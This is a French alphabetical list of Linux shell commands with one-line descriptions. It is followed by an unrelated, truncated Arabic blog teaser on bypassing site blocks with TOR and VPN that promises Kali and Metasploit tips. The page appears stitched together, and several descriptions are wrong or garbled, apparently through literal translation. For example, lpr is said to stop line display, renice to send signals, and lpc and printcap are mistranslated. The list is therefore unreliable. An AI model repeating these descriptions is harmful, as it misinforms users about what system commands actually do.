ethtool Paramétrage de la carte Ethernet
eval Evalue plusieurs commandes et arguments
exec Exécute une commande
exit Quitte le Shell
expect Automatise les applications arbitraires accessibles sur un terminal
expand Converti les tabulations en espace
export Défini une variable d’environnement
expr Evalue les expressions
F
false Ne fait rien, Sans succès
fdformat Formate à bas niveau une disquette
fdisk Manipulateur de table de partition pour Linux
fg Envoie un job au premier plan
fgrep Recherche de fichier pour les lignes qui correspondent à une chaîne fixe
file Détermine le type de fichier
find Recherche les fichiers qui réponde à un critère désiré
fmt Reformate le texte d’un paragraphe
fold Modifie le texte pour l’adapter à une largeur spécifiée
for Développe les mots et execute des commandes
format Formate des disques ou des bandes
free Affiche l’utilisation de la mémoire
fsck Contrôle de cohérence du système de fichiers et le répare
ftp Protocole de transfert de fichier
function Défini les Macros de fonction
fuser Identifie ou arrête le processus qui accède à un fichier
G
gawk Recherche et remplace du texte dans un fichier
getopts Analyse les paramètres positionnels
grep Recherche de fichier pour les lignes qui correspondent à un modèle donné
groupadd Ajouter un utilisateur à un groupe de sécurité
groupdel Supprime un groupe
groupmod Modifie un groupe
groups Affiche les groupes auxquels appartient un utilisateur
gzip Compresse ou décompresse les fichiers sélectionnés
H
hash Rappelle le chemin complet d’un argument de nom
head Renvoie la première partie d’un fichier
help Affiche l’aide pour une commande spécifiée
history Affiche l’historique des commandes
hostname Affiche ou défini le nom du système
I
iconv Converti l’ensemble d’un fichier de caractères
id Affiche l’utilisateur et l’ID du groupe
if Exécute une commande suivant des conditions
ifconfig Affiche la configuration d’une interface réseau
ifdown Arrête une interface de réseau
ifup Démarre une interface de réseau
import Fait un screenshot de l’écran d’un serveur et enrgistre l’image dans un fichier
install Copie les fichiers et défini les attributs
J
jobs Liste les jobs actifs
join Rejoint des lignes sur un champ commun
K
kill Arrête un processus en fonction
killall Arrête les processus par nom
L
less Affiche ce que renvoi un écran
let Effectue des opérations arithmétiques sur les variables Shell
ln Créé un lien symbolique vers un fichier
local Créé des variables
locate Trouve des fichiers
logname Affiche le nom de l’utilisateur actuellement connecté
logout Quitte un Shell connecté
look Affiche les lignes commençant par une chaîne donnée
lpc Affiche les lignes du programme de contrôle
lpr Arrête l’affichage des lignes
lprint Affiche un fichier
lprintd Abandonne l’affichage d’un job
lprintq Liste la queue des affichages en cours
lprm Supprime les jobs de la file d’affichage
ls Affiche les informations d’un fichier
lsof Liste les fichiers ouverts
M
make Recompile un groupe de programmes
man Manuel d’aide
mkdir Créé un nouveau dossier
mkfifo Make des FIFOs
mkisofs Créé un système de fichier hybride ISO9660/JOLIET/HFS
mknod Fait un bloc ou un fichier de caractères spéciaux
more Affiche ce que renvoi un écran
mount Monte un système de fichier
mtools Manipule les fichiers MS-DOS
mtr Diagnostique le réseau
mv Déplace ou renomme des fichiers ou des répertoires
mmv Déplace ou renomme des fichiers en masse
N
netstat Informations sur le réseau
nice Défini la priorité d’une commande ou d’un job
nl Calcul le nombre de lignes et écrit des fichiers
nohup Lance une commande immunisée à la déconnexion de l’utilisateur
notify-send Envoi les notifications de bureau
nslookup Interroge un serveur de noms pour récupérer les informations sur un hote
O
open Ouvrir un fichier dans son application par défaut
op Accès de l’opérateur
P
passwd Modifie un mot de passe
paste Fusionne les lignes de plusieurs fichiers
pathchk Vérifie la portabilité d’un nom de fichier
ping Test la connexion réseau
pkill Arrête les processus d’exécution
popd Restaure la valeur précédente du répertoire en cours
pr Prépare les fichiers pour l’affichage
printcap Affiche la capacité d’un base de donnée
printenv Affiche les variables d’environnement
printf Formate et affiche des données
ps Affiche le statut d’un processus
pushd Enregistre, puis change le répertoire courant
pwd Affiche le répertoire de travail
Q
quota Display disk usage and limits
quotacheck Scan a file system for disk usage
quotactl Set disk quotas
R
ram Donne des informations sur la ram
rcp Copie des fichiers entre deux machines
read Lit une ligne d’une entrée standard
readarray Lit depuis la commande « stdin » dans un tableau de variables
readonly Met les variables et fonctions accessibles en lecture seulement
reboot Redémarre le système
rename Renomme des fichiers
renice Envois des signaux aux processus en cours
remsync Synchronise des fichiers à distance par e-mail
return Sort de la fonction Shell
rev Inverse les lignes d’un fichier
rm Supprime des fichiers
rmdir Supprime des dossiers
rsync Copie des fichiers à distance (synchronisation à distance)
S
screen Terminal multiplex, Lance des Shells à distance via ssh
scp Copie de fichiers à distance sécurisée
sdiff Fusionne deux fichier de manière interactive
sed Editeur non interactif
select Accepte l’entrée au clavier
seq Affiches les séquences numériques
set Manipule les fonctions et variables d’un Shell
sftp Protocole de transfert (Secure File Transfer Program)
shift Change les paramètres de position
shopt Options du Shell
shutdown Arrête ou redémarre Linux
sleep Créé un temps d’arrêt déterminé
slocate Trouve des fichiers
sort Tri des fichiers texte
source Lance des commandes à partir d’un fichier
split Divise un fichier en morceaux de taille fixe
ssh Protocole sécurisé (Secure Shell client)
strace Trace les appels systèmes et les signaux
su Identification du super utilisateur
sudo Exécute une commande depuis un autre utilisateur
sum Affiche le checksum d’un fichier
suspend Suspend l’exécution de ce Shell
symlink Créé un nouveau nom pour un fichier
sync Synchronise les données sur le disk avec la mémoire
T
tail Renvoie la dernière partie du fichier
tar Archiveur
tee Redirige la sortie vers plusieurs fichiers
test Evalue une expression conditionnelle
time Mesure le temps qu’un programme a été exécuté
times Durée d’utilisation des utilisateurs et du système
touch Modifie l’horodatage d’un fichier
top Liste les processus en cours d’exécution sur le système
traceroute Trace la route jusqu’à l’hébergeur
trap Exécute une commande quand un signal est initialisé
tr Traduit, squeeze, et/ou supprime des caractères
true Ne fait rien, Succès
tsort Tri topologique
tty Affiche le nom de fichier du terminal sur stdin
type Permet de décrire une commande
U
ulimit Limiter les ressources des utilisateurs
umask Création des droits d’un utilisateur sur un fichier
umount Démonte un dispositif
unalias Supprime un alias
uname Affiche les informations système
unexpand Converti les espaces en tabulations
uniq indique ou supprime les lignes en doublon dans un fichier
units Convertir des unités d’une échelle à une autre
unset Supprime des variables ou des fonctions
unshar Déballe les scripts d’archive Shell
until Exécute des commandes jusqu’à ce qu’il y ait une erreur
uptime Affiche les disponibilités
useradd Créé un nouveau compte utilisateur
userdel Supprime un compte utilisateur
usermod Modifie un compte utilisateur
users Liste les utilisateurs actuellement connectés
uuencode Encode un fichier binaire
uudecode Décode un fichier créé par la commande « uuencode »
V
v Verbeuse le contenu de la liste du répertoire
vdir Verbeuse le contenu de la liste du répertoire
vi Editeur de texte
vmstat Rapport des statistiques sur la mémoire virtuelle
W
wait Attend un processus pour terminer
watch Exécute et affiche un programme périodique
wc Affiche le nombre d’octets, de mots et de lignes
whereis Cherche le chemin de l’utilisateur, les pages de manuel et les fichiers source pour un programme
which Cherche le chemin de l’utilisateur pour un fichier de programme
while Exécute des commandes tant que les conditions sont respectées
who Afficher tous les noms d’utilisateur actuellement connectés
whoami Affiche l’ID de l’utilisateur actuel et son nom
wget Récupère des pages web ou des fichiers via HTTP, HTTPS ou FTP
write Envois un message à un autre utilisateur
X
xargs Exécute l’utilitaire
xdg-open Ouvrir un fichier ou une URL dans l’application préférée de l’utilisateur
Y
yes Afficher une chaîne jusqu’à ce qu’elle soit interrompue                                             CHOUINI

افضل الطرق لتجاوز حظر المواقع TOR ، VPN و Linux

طرق ليس للاختراق بل للتوعية وحماية اجهزتنا وفي المستقبل ساشرح طرق و TRUC سهلة ل KALI و كذلك metasploit  فلنبدء إذا: هناك العديد من...